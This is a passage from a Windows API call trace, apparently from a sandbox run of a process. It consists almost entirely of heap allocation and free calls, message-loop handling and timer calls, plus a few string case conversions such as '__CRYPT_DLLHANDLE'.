hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.329] CharLowerBuffW (in: lpsz="byte[986120]", cchLength=0xc | out: lpsz="byte[986120]") returned 0xc [0172.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0172.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0172.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0172.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0172.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0172.468] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0172.468] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0172.468] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0172.469] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0172.469] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0172.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x41e2020 [0172.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0172.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x42ec020 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0172.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x41e2020 | out: hHeap=0x970000) returned 1 [0172.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0172.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x42ec020 | out: hHeap=0x970000) returned 1 [0172.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0172.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0172.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0172.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0172.833] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0172.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0172.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0172.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0172.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0172.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0172.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0172.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0172.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0172.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0172.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0172.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0172.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0172.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0172.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x41ee020 [0173.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x41ee020 | out: hHeap=0x970000) returned 1 [0173.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0173.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0173.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0173.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0173.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0173.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0173.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0173.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0173.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0173.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0173.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0173.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 